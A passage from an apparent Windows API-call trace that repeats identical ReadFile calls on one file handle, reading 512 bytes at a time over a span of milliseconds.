lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, 
lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile 
(in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 
[0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, 
lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, 
lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: 
lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, 
lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.774] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.774] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.774] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.774] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, 